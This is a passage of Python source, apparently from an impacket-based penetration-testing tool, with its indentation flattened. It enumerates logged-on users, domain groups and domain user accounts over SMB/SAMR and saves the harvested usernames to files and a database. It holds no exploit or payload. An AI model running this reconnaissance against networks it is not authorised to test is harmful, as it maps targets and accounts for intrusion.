dce.disconnect()
return
def loggedon1(smb):
"""Enumerate Loggedon users.
I think it requires localadmin, but handles if it doesnt work.
"""
self = smb
enumlog = ''
enumlog += 'Executed as {} \n'.format(self.username)
try:
#self.logger.announce('Checking for logged on users')
rpctransport = impacket.dcerpc.v5.transport.SMBTransport(
self.host, 445, r'\wkssvc', smb_connection=self.conn)
dce = rpctransport.get_dce_rpc()
dce.connect()
try:
logging.debug('loggedon Binding start')
dce.bind(impacket.dcerpc.v5.wkst.MSRPC_UUID_WKST)
try:
logging.debug('Get loggedonUsers via hNetrWkstaUserEnum...')
#self.logger.announce('Attempting to enum loggedon users...')
resp = impacket.dcerpc.v5.wkst.hNetrWkstaUserEnum(
dce, 1
) # theres a version that takes 0, not sure the difference?
self.logger.success('Loggedon-Users enumerated on {} !'.format(
self.host))
for wksta_user in resp['UserInfo']['WkstaUserInfo']['Level1'][
'Buffer']:
wkst_username = wksta_user[
'wkui1_username'][:
-1] # These are defined in https://github.com/SecureAuthCorp/impacket/blob/master/impacket/dcerpc/v5/wkst.py#WKSTA_USER_INFO_1
#self.logger.results('User:{} is currently logged on {}'.format(wkst_username,self.host))
self.logger.highlight(
"{} is currently logged on {} ({})".format(
wkst_username, self.host, self.hostname))
enumlog += "{} is currently logged on {} ({}) \n".format(
wkst_username, self.host, self.hostname)
except Exception as e: #failed function
logging.debug('failed function {}'.format(str(e)))
self.logger.error(
'Failed to enum Loggedon Users, win10 may require localadmin?'
)
dce.disconnect()
return
except Exception as e: #failed bind
logging.debug('failed bind {}'.format(str(e)))
dce.disconnect()
return
except Exception as e: #failed connect
logging.debug('failed connect {}'.format(str(e)))
dce.disconnect()
return
if self.args.logs:
ctime = datetime.now().strftime("%b.%d.%y_at_%H%M")
log_name = 'Loggedon-Users_of_{}_on_{}.log'.format(self.host, ctime)
write_log(str(enumlog), log_name)
self.logger.announce("Saved Loggedon-Users output to {}/{}".format(
cfg.LOGS_PATH, log_name))
#self.logger.announce('Finished checking for logged on users')
dce.disconnect()
return
def group1(smb):
"""Enum domain groups.
Prints output and adds them to cmxdb
"""
self = smb
if self.args.groups:
targetGroup = self.args.groups
groupFound = False
groupLog = ''
#self.logger.announce('Starting Domain Group Enum')
try:
rpctransport = impacket.dcerpc.v5.transport.SMBTransport(
self.dc_ip,
445,
r'\samr',
username=self.username,
password=self.password) #domain=self.domain
dce = rpctransport.get_dce_rpc()
dce.connect()
try:
logging.debug('Get net groups Binding start')
dce.bind(impacket.dcerpc.v5.samr.MSRPC_UUID_SAMR)
try:
logging.debug('Connect w/ hSamrConnect...')
resp = impacket.dcerpc.v5.samr.hSamrConnect(dce)
logging.debug('Dump of hSamrConnect response:')
if self.debug:
resp.dump()
serverHandle = resp['ServerHandle']
self.logger.debug('Looking up reachable domain(s)')
resp2 = impacket.dcerpc.v5.samr.hSamrEnumerateDomainsInSamServer(
dce, serverHandle)
logging.debug(
'Dump of hSamrEnumerateDomainsInSamServer response:')
if self.debug:
resp2.dump()
domains = resp2['Buffer']['Buffer']
tmpdomain = domains[0]['Name']
logging.debug('Looking up groups in domain: ' +
domains[0]['Name'])
resp = impacket.dcerpc.v5.samr.hSamrLookupDomainInSamServer(
dce, serverHandle, domains[0]['Name'])
logging.debug('Dump of hSamrLookupDomainInSamServer response:')
if self.debug:
resp.dump()
resp = impacket.dcerpc.v5.samr.hSamrOpenDomain(
dce, serverHandle=serverHandle, domainId=resp['DomainId'])
logging.debug('Dump of hSamrOpenDomain response:')
if self.debug:
resp.dump()
domainHandle = resp['DomainHandle']
status = impacket.nt_errors.STATUS_MORE_ENTRIES
enumerationContext = 0
self.logger.success('Domain Groups enumerated')
self.logger.highlight(
" {} Domain Group Accounts".format(tmpdomain))
while status == impacket.nt_errors.STATUS_MORE_ENTRIES:
try:
resp = impacket.dcerpc.v5.samr.hSamrEnumerateGroupsInDomain(
dce,
domainHandle,
enumerationContext=enumerationContext)
logging.debug(
'Dump of hSamrEnumerateGroupsInDomain response:')
if self.debug:
resp.dump()
except impacket.dcerpc.v5.rpcrt.DCERPCException as e:
if str(e).find('STATUS_MORE_ENTRIES') < 0:
raise
resp = e.get_packet()
for group in resp['Buffer']['Buffer']:
gid = group['RelativeId']
r = impacket.dcerpc.v5.samr.hSamrOpenGroup(
dce, domainHandle, groupId=gid)
logging.debug('Dump of hSamrOpenUser response:')
if self.debug:
r.dump()
info = impacket.dcerpc.v5.samr.hSamrQueryInformationGroup(
dce, r['GroupHandle'], impacket.dcerpc.v5.samr.
GROUP_INFORMATION_CLASS.GroupGeneralInformation)
#info response object (SAMPR_GROUP_GENERAL_INFORMATION) defined in impacket/samr.py # 2.2.5.7 SAMPR_GROUP_INFO_BUFFER
logging.debug(
'Dump of hSamrQueryInformationGroup response:')
if self.debug:
info.dump()
#self.logger.results('Groupname: {:<30} membercount: {}'.format(group['Name'], info['Buffer']['General']['MemberCount']))
#print('')
self.logger.highlight('{:<30} membercount: {}'.format(
group['Name'],
info['Buffer']['General']['MemberCount']))
groupLog += '{:<30} membercount: {}\n'.format(
group['Name'],
info['Buffer']['General']['MemberCount'])
impacket.dcerpc.v5.samr.hSamrCloseHandle(
dce, r['GroupHandle'])
enumerationContext = resp['EnumerationContext']
status = resp['ErrorCode']
except Exception as e: #failed function
logging.debug('failed function {}'.format(str(e)))
self.logger.error('Failed to enum Domain Groups')
dce.disconnect()
return
except Exception as e: #failed bind
logging.debug('failed bind {}'.format(str(e)))
dce.disconnect()
return
except Exception as e: #failed connect
logging.debug('failed connect {}'.format(str(e)))
dce.disconnect()
return
try:
dce.disconnect()
except:
pass
if self.args.logs:
ctime = datetime.now().strftime("%b.%d.%y_at_%H%M")
log_name = 'Domain_Groups_of_{}_on_{}.log'.format(tmpdomain, ctime)
write_log(str(groupLog), log_name)
self.logger.announce("Saved Group Members output to {}/{}".format(
cfg.LOGS_PATH, log_name))
#self.logger.announce('Finished Domain Group Enum')
return
def users1(smb):
"""Enum domain users."""
users = ''
self = smb
#self.logger.announce('Starting Domain Users Enum')
if self.args.save:
filename = "{}-users.txt".format(self.domain)
savefile = open(filename, "w")
try:
rpctransport = impacket.dcerpc.v5.transport.SMBTransport(
self.dc_ip,
445,
r'\samr',
username=self.username,
password=self.password) #domain=self.domain
dce = rpctransport.get_dce_rpc()
dce.connect()
try:
logging.debug('NetUsers Binding start')
dce.bind(impacket.dcerpc.v5.samr.MSRPC_UUID_SAMR)
try:
logging.debug('Connect w/ hSamrConnect...')
resp = impacket.dcerpc.v5.samr.hSamrConnect(dce)
logging.debug('Dump of hSamrConnect response:')
if self.debug:
resp.dump()
serverHandle = resp['ServerHandle']
self.logger.debug('Looking up domain name(s)')
resp2 = impacket.dcerpc.v5.samr.hSamrEnumerateDomainsInSamServer(
dce, serverHandle)
logging.debug(
'Dump of hSamrEnumerateDomainsInSamServer response:')
if self.debug:
resp2.dump()
domains = resp2['Buffer']['Buffer']
tmpdomain = domains[0]['Name']
self.logger.debug('Looking up users in domain:' +
domains[0]['Name'])
resp = impacket.dcerpc.v5.samr.hSamrLookupDomainInSamServer(
dce, serverHandle, domains[0]['Name'])
logging.debug('Dump of hSamrLookupDomainInSamServer response:')
if self.debug:
resp.dump()
resp = impacket.dcerpc.v5.samr.hSamrOpenDomain(
dce, serverHandle=serverHandle, domainId=resp['DomainId'])
logging.debug('Dump of hSamrOpenDomain response:')
if self.debug:
resp.dump()
domainHandle = resp['DomainHandle']
status = impacket.nt_errors.STATUS_MORE_ENTRIES
enumerationContext = 0
self.logger.success('Domain Users enumerated')
self.logger.highlight(
" {} Domain User Accounts".format(tmpdomain))
while status == impacket.nt_errors.STATUS_MORE_ENTRIES:
try:
resp = impacket.dcerpc.v5.samr.hSamrEnumerateUsersInDomain(
dce,
domainHandle,
enumerationContext=enumerationContext)
logging.debug(
'Dump of hSamrEnumerateUsersInDomain response:')
if self.debug:
resp.dump()
except impacket.dcerpc.v5.rpcrt.DCERPCException as e:
if str(e).find('STATUS_MORE_ENTRIES') < 0:
raise
resp = e.get_packet()
for user in resp['Buffer']['Buffer']:
r = impacket.dcerpc.v5.samr.hSamrOpenUser(
dce, domainHandle,
impacket.dcerpc.v5.samr.MAXIMUM_ALLOWED,
user['RelativeId'])
logging.debug('Dump of hSamrOpenUser response:')
if self.debug:
r.dump()
# r has the clases defined here:
#https://github.com/SecureAuthCorp/impacket/impacket/dcerpc/v5/samr.py #2.2.7.29 SAMPR_USER_INFO_BUFFER
#self.logger.results('username: {:<25} rid: {}'.format(user['Name'], user['RelativeId']))
self.logger.highlight('{}\\{:<20} rid: {}'.format(
tmpdomain, user['Name'], user['RelativeId']))
users += '{}\\{:<20} rid: {}\n'.format(
tmpdomain, user['Name'], user['RelativeId'])
self.db.add_user(self.domain, user['Name'])
if self.args.save:
savefile.write("{}\n".format(user['Name']))
info = impacket.dcerpc.v5.samr.hSamrQueryInformationUser2(
dce, r['UserHandle'], impacket.dcerpc.v5.samr.
USER_INFORMATION_CLASS.UserAllInformation)
logging.debug(
'Dump of hSamrQueryInformationUser2 response:')
if self.debug:
info.dump()
impacket.dcerpc.v5.samr.hSamrCloseHandle(
dce, r['UserHandle'])
enumerationContext = resp['EnumerationContext']
status = resp['ErrorCode']
except Exception as e: #failed function
logging.debug('failed function {}'.format(str(e)))
self.logger.error('Failed to enum Domain Users')
dce.disconnect()
return list()
except Exception as e: #failed bind
logging.debug('failed bind {}'.format(str(e)))
dce.disconnect()
return list()
except Exception as e: #failed connect
logging.debug('failed connect {}'.format(str(e)))
dce.disconnect()
return list()
if self.args.save:
savefile.close()
self.logger.success("Usernames saved to: {}".format(filename))
try:
dce.disconnect()
except:
self.logging.error('Failed dce disconnect during users')
pass
if self.args.logs:
ctime = datetime.now().strftime("%b.%d.%y_at_%H%M")
log_name = 'Domain_Users_of_{}_on_{}.log'.format(tmpdomain, ctime)
write_log(str(users), log_name)
self.logger.announce("Saved Domain Users output to {}/{}".format(
cfg.LOGS_PATH, log_name))
#self.logger.announce('Finished Domain Users Enum')
return
